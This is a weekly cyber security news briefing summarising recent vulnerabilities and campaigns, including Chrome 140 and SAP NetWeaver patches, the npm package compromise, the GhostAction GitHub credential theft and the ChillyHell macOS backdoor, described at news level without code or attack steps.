Hybrid Cloud
Cyber Security & NaaS
AI & Data
IoT & Connectivity
Business Applications
Intelligent Workplace
Consulting & Professional Services
Small Medium Enterprise
Health and Social Care
Industry
Retail
Tourism and Leisure
Transport & Logistics
Energy & Utilities
Cyber Security Weekly Briefing, 6-12 September
New bugs patched in Chrome 140
Google has released Chrome 140 (versions 140.0.7339.80/81 for Windows and Mac, and 140.0.7339.80 for Linux), fixing six security vulnerabilities, including the CVE-2025-9864 flaw (CVSSv3 of 8.8 according to CISA). This use-after-free flaw in the V8 JavaScript engine allows remote code execution, with the risk of data theft or system compromise.
Other vulnerabilities of varying severity were also fixed: CVE-2025-9865 (CVSSv3 of 5.4 according to CISA, improper implementation in the toolbar), CVE-2025-9866 (CVSSv3 of 8.8 according to CISA, problems in the extension system), and CVE-2025-9867 (CVSSv3 of 5.4 according to CISA, flaw in the download component). It should be noted that no PoCs or known exploits have been published.
Google recommends updating Chrome immediately to mitigate remote execution risks and other threats.
NPM attack: packages with 2.6 billion downloads per week compromised to steal cryptocurrencies
A supply chain attack compromised NPM packages with more than 2.6 billion downloads per week after a maintainer's credentials were stolen via phishing. The affected developer, Josh Junon (qix), confirmed that he fell for a fake email pretending to be from npmjs.com, which allowed the attackers to take control of his account and publish malicious versions.
These versions contained code injected into index.js files capable of intercepting web traffic and manipulating APIs, redirecting cryptocurrency transactions to attacker-controlled wallets. The malware was designed to act in browsers, affecting Ethereum, Bitcoin, Solana, Tron, Litecoin and Bitcoin Cash. Among the affected packages are debug, chalk, strip-ansi and ansi-styles, all with massive weekly downloads. This incident adds to a number of recent attacks against popular JavaScript libraries.
GhostAction campaign on GitHub: massive theft of 3,325 credentials in 817 repositories
GitGuardian has discovered GhostAction, a widespread supply chain attack campaign that compromised 817 repositories on GitHub belonging to 327 users. The attackers injected malicious workflows capable of exfiltrating secrets via HTTP requests to a server controlled by them, managing to steal 3325 credentials, including PyPI tokens, npm, DockerHub, GitHub and cloud service keys.
The attack started with the FastUUID project, where a fraudulent stream was introduced that subtracted the PyPI token, although no malicious releases were detected in that package. The investigation revealed a repeated pattern across multiple public and private repositories, where attackers identified secrets in legitimate workflows and forwarded them to the bold-dhawan.45-139-104-115.plesk.page domain, active until the same day of detection. GitGuardian notified those affected and the platforms involved (GitHub, PyPI and npm).
SAP fixes three critical bugs in NetWeaver and other enterprise solutions
SAP has released its September security bulletin fixing 21 vulnerabilities in its products, three of them of critical severity. The most serious, CVE-2025-42944 (CVSSv3 10.0 according to vendor), is an insecure deserialization flaw in SAP NetWeaver ServerCore 7.50 that allows remote command execution without authentication by sending malicious Java objects.
The second critical flaw, CVE-2025-42922 (CVSSv3 9.9 according to SAP), affects NetWeaver AS Java and allows an authenticated attacker to upload arbitrary files, compromising the system. The third, CVE-2025-42958 (CVSSV3 9.1 according to vendor), is a lack of authentication validation that enables unauthorized privileged users to access, modify or delete sensitive data.
SAP recommends upgrading to the fixed versions and applying mitigations immediately, as its solutions are widely used in critical environments and represent a priority target for attackers.
ChillyHell: modular backdoor for macOS evades Apple controls from 2021
Jamf Threat Labs published an in-depth analysis of ChillyHell, a modular backdoor for macOS active since 2021 and discovered on VirusTotal. This malware is notable for having been developer-signed and approved in Apple's notarization process, which allowed it to go undetected for years. Initially associated with the UNC4487 group in a private Mandiant report, ChillyHell employs several advanced techniques, such as system profiling, persistence via LaunchAgents, LaunchDaemons or shell profile injection, timestomping and a main cycle of communication with C2 via HTTP or DNS.
Among its modules, it includes reverse shell, auto-update, binary loading and credential brute-force functions, the latter linked to Kerberos attacks. It also opens a browser with Google as a decoy to reduce suspicion. Following these revelations, Apple revoked the developer certificates used by the attackers.
◾ This newsletter is one of the deliverables of our Operational and Strategic Intelligence service. If you are interested in knowing the rest of the Operational and Strategic Intelligence contents included in the service, please contact us →
